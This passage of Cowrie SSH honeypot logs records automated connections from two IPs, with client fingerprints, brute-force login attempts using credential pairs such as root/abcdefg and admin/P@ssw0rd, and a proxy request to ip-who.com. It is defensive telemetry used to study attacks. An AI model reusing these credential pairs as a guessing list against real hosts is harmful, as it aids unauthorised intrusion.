penssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:08:34.144383Z","src_ip":"212.227.235.229","session":"040a89cff033"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":60326,"dst_ip":"1.2.3.4","dst_port":22,"session":"d94903575a83","protocol":"ssh","message":"New connection: 68.183.87.241:60326 (1.2.3.4:22) [session: d94903575a83]","sensor":"my-vps","timestamp":"2025-08-26T04:08:34.229397Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:08:34.231112Z","src_ip":"68.183.87.241","session":"d94903575a83"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:08:34.502200Z","src_ip":"68.183.87.241","session":"d94903575a83"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:34.757871Z","src_ip":"212.227.235.229","session":"7d4c0de48639"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:08:35.620622Z","src_ip":"68.183.87.241","session":"d94903575a83"}
{"eventid":"cowrie.login.success","username":"root","password":"abcdefg","message":"login attempt [root/abcdefg] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:08:35.630968Z","src_ip":"212.227.235.229","session":"040a89cff033"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:35.891522Z","src_ip":"68.183.87.241","session":"62d1b0b85767"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:35.893025Z","src_ip":"68.183.87.241","session":"d94903575a83"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32826,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a2be6086148","protocol":"ssh","message":"New connection: 212.227.235.229:32826 (1.2.3.4:22) [session: 4a2be6086148]","sensor":"my-vps","timestamp":"2025-08-26T04:08:36.722581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:08:36.900907Z","src_ip":"212.227.235.229","session":"4a2be6086148"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:08:36.984169Z","src_ip":"212.227.235.229","session":"4a2be6086148"}
{"eventid":"cowrie.login.failed","username":"btf","password":"321start","message":"login attempt [btf/321start] failed","sensor":"my-vps","timestamp":"2025-08-26T04:08:38.820442Z","src_ip":"212.227.235.229","session":"4a2be6086148"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T04:08:39.007295Z","session":"040a89cff033"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33592,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab4549912fc9","protocol":"ssh","message":"New connection: 212.227.235.229:33592 (1.2.3.4:22) [session: ab4549912fc9]","sensor":"my-vps","timestamp":"2025-08-26T04:08:39.966294Z"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:40.121472Z","src_ip":"212.227.235.229","session":"4a2be6086148"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:08:40.398144Z","src_ip":"212.227.235.229","session":"ab4549912fc9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:08:40.438157Z","src_ip":"212.227.235.229","session":"ab4549912fc9"}
{"eventid":"cowrie.session.closed","duration":"18.8","message":"Connection lost after 18.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:41.324615Z","src_ip":"212.227.235.229","session":"040a89cff033"}
{"eventid":"cowrie.login.failed","username":"rebecca","password":"rebecca","message":"login attempt [rebecca/rebecca] failed","sensor":"my-vps","timestamp":"2025-08-26T04:08:48.561806Z","src_ip":"212.227.235.229","session":"ab4549912fc9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57942,"dst_ip":"1.2.3.4","dst_port":22,"session":"622c40d6c597","protocol":"ssh","message":"New connection: 212.227.235.229:57942 (1.2.3.4:22) [session: 622c40d6c597]","sensor":"my-vps","timestamp":"2025-08-26T04:08:49.335656Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:08:49.391545Z","src_ip":"212.227.235.229","session":"622c40d6c597"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:08:49.598416Z","src_ip":"212.227.235.229","session":"622c40d6c597"}
{"eventid":"cowrie.session.closed","duration":"10.4","message":"Connection lost after 10.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:50.358828Z","src_ip":"212.227.235.229","session":"ab4549912fc9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"P@ssw0rd","message":"login attempt [admin/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T04:08:51.479044Z","src_ip":"212.227.235.229","session":"622c40d6c597"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:52.738502Z","src_ip":"212.227.235.229","session":"622c40d6c597"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57958,"dst_ip":"1.2.3.4","dst_port":22,"session":"da90afe65f78","protocol":"ssh","message":"New connection: 212.227.235.229:57958 (1.2.3.4:22) [session: da90afe65f78]","sensor":"my-vps","timestamp":"2025-08-26T04:08:54.759425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:08:54.760924Z","src_ip":"212.227.235.229","session":"da90afe65f78"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:08:55.013214Z","src_ip":"212.227.235.229","session":"da90afe65f78"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57960,"dst_ip":"1.2.3.4","dst_port":22,"session":"d140cbb1e796","protocol":"ssh","message":"New connection: 212.227.235.229:57960 (1.2.3.4:22) [session: d140cbb1e796]","sensor":"my-vps","timestamp":"2025-08-26T04:08:55.756172Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:08:55.922739Z","src_ip":"212.227.235.229","session":"d140cbb1e796"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:08:56.054990Z","src_ip":"212.227.235.229","session":"d140cbb1e796"}
{"eventid":"cowrie.login.success","username":"root","password":"libreelec","message":"login attempt [root/libreelec] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:08:57.979047Z","src_ip":"212.227.235.229","session":"da90afe65f78"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53072,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee4e83bfe9b3","protocol":"ssh","message":"New connection: 212.227.235.229:53072 (1.2.3.4:22) [session: ee4e83bfe9b3]","sensor":"my-vps","timestamp":"2025-08-26T04:08:58.231838Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:08:58.232838Z","src_ip":"212.227.235.229","session":"ee4e83bfe9b3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256